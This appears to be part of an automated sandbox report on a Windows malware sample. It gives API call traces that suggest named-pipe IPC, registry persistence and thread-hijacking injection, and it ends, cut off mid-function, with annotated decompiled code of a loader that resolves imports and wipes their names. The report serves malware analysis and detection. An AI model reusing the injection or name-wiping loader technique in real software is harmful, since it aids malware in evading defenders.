    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				/* Decompiler output from the sandbox; the comments are editorial annotations.
				 * __edi : base address of the in-memory PE image
				 * _a4   : pointer to its IMAGE_NT_HEADERS (+0x80 = Import Directory RVA, +0x50 = SizeOfImage)
				 * Walks the import descriptors, resolves each import with LoadLibraryA / GetProcAddress,
				 * writes the address into the IAT and zeroes the DLL and function name strings afterwards.
				 * Returns 0 on success, 0x7e (ERROR_MOD_NOT_FOUND) or 0x7f (ERROR_PROC_NOT_FOUND). */
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t11;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); /* Import Directory RVA */
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; /* first IMAGE_IMPORT_DESCRIPTOR */
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); /* descriptor->Name (RVA of the DLL name) */
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); /* wipe the DLL name once the module is loaded */
					_t27 =  *_t34; /* descriptor->OriginalFirstThunk */
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); /* descriptor->FirstThunk (IAT) */
					_t50 =  &(_t50[3]); /* cdecl stack cleanup after memset (decompiler artifact) */
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42; /* current thunk entry */
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							/* advance to the next import descriptor (sizeof(IMAGE_IMPORT_DESCRIPTOR) == 0x14) */
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42; /* distance from the name thunk to the matching IAT slot */
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							/* high bit set: import by ordinal; reject values outside the image */
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42; /* IMAGE_IMPORT_BY_NAME */
						}
						_t11 = _t28 + 2; // 0x2: skip the Hint field to reach the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); /* wipe the function name after resolving it */
							_t50 =  &(_t50[3]);
						}
